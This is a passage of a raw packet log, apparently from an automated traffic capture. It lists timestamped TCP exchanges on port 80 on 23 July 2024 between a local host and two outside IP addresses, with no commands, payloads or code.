                                              Jul 23, 2024 06:16:17.658417940 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.658427000 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.658457994 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.658472061 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.658492088 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.658521891 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.658541918 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.658554077 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.658585072 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.658600092 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.658617973 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.658649921 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.658662081 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.659229994 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.659261942 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.659276009 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.659293890 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.659326077 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.659341097 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.659358025 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.659389019 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.659400940 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.659420967 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.659452915 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.659481049 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.659486055 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.659512043 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.659535885 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.659543991 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.659574986 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.659585953 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.659607887 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.659647942 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.660028934 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.660069942 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.660116911 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.692982912 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.693177938 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.693224907 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.693238974 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.693257093 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.693288088 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.693306923 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.693319082 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.693351030 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.693361998 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.736278057 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.736345053 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.736350060 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.736382008 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.736424923 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.736519098 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.736650944 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.736680984 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.736699104 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.736713886 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.736746073 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.736761093 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.736778975 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.736821890 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.737066984 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.737114906 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.737145901 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.737178087 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.737209082 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.737240076 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.737256050 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.737272024 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.737279892 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.737303972 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.737329960 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.737335920 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.737355947 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.737420082 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.737562895 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.737793922 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.737824917 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.737857103 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.737896919 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.737936974 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.737982988 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.738101959 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.738133907 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.738164902 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.738178015 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.738198042 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.738229036 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.738241911 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.738260031 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.738291979 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.738302946 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.738323927 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.738354921 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.738372087 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.738387108 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.738429070 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.739017010 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.739048958 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.739079952 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.739098072 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.739110947 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.739142895 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.739154100 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.739175081 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.739207029 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.739222050 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.739239931 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.739270926 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.739285946 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.739303112 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.739330053 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.739346027 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.739362001 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.739396095 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.739404917 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.739943981 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.739975929 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.739989042 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.740008116 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.740039110 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.740056992 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.740070105 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.740103006 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.740113020 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.740130901 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.740161896 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.740175009 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.740195990 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.740227938 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.740238905 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.740259886 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.740292072 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.740308046 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.740833998 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.740865946 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.740885973 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.740897894 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.740936041 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.740947962 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.740967035 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.740998983 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.741014004 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.741028070 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.741058111 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.741075039 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.741090059 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.741122007 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.741134882 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.741154909 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.741185904 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.741194963 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.741219044 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.741262913 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.741584063 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.741614103 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.741663933 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.741734982 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.741766930 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.741797924 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.741810083 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.741830111 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.741861105 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.741880894 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.741893053 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.741924047 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.741951942 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.741956949 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.741987944 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.742002010 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.742021084 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.742065907 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.742655039 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.742686987 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.742718935 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.742733955 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.742750883 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.742782116 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.742794037 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.742814064 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.742845058 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.742861032 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.742877960 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.742906094 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.742930889 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.742937088 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.742969990 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.742981911 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.743000984 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.743053913 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.743552923 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.743586063 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.743617058 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.743627071 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.743650913 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.743681908 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.743694067 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.743714094 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.743745089 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.743756056 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.743777037 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.743808985 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.743820906 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.743839979 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.743870974 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.743881941 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.743905067 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.743948936 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.744110107 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.744142056 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.744190931 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.780612946 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.780864954 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.780896902 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.780909061 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.780936003 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.780970097 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.780989885 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.781001091 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.781033993 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.781043053 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.823962927 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.824014902 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.824018002 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.824050903 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.824091911 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.824161053 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.824192047 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.824223995 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.824235916 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.824286938 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.824336052 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.824394941 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.824426889 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.824457884 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.824469090 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.824526072 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.824557066 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.824573040 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.824589968 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.824635983 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.824861050 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.825052977 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.825083971 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.825097084 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.825117111 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.825149059 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.825159073 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.825181007 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.825213909 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.825225115 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.825246096 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.825277090 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.825287104 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.825309038 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.825341940 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.825346947 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.825373888 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.825407982 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.825422049 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.825692892 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.825738907 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.825825930 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.825858116 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.825890064 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.825901985 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.825922966 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.825953007 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.825964928 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.825984955 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.826016903 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.826028109 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.826049089 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.826081038 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.826091051 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.826112986 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.826143026 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.826158047 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.826174021 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.826204062 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.826215982 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.826781988 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.826813936 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.826828957 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.826845884 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.826878071 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.826888084 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.826908112 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.826939106 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.826950073 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.826967001 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.826997995 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.827013016 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.827029943 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.827061892 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.827073097 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.827094078 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.827126026 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.827135086 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.827157021 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.827188015 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.827203035 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.827580929 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.827619076 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.827625990 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.827652931 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.827693939 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.827702045 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.827733040 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.827764034 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.827776909 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.827795982 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.827827930 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.827838898 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.827858925 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.827892065 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.827902079 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.827924013 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.827955961 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.827966928 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.827987909 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.828027964 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.828600883 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.828634024 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.828665018 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.828680992 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.828697920 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.828728914 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.828738928 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.828761101 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.828793049 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.828802109 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.828825951 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.828856945 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.828866959 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.828890085 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.828936100 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.892940998 CEST4972880192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:17.897840977 CEST804972858.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:17.897924900 CEST4972880192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:17.898041964 CEST4972880192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:17.898070097 CEST4972880192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:17.903019905 CEST804972858.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:17.903034925 CEST804972858.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:20.169270039 CEST804972858.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:20.170136929 CEST804972858.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:20.170197010 CEST4972880192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:20.170233965 CEST4972880192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:20.172563076 CEST4972980192.168.2.558.151.148.90
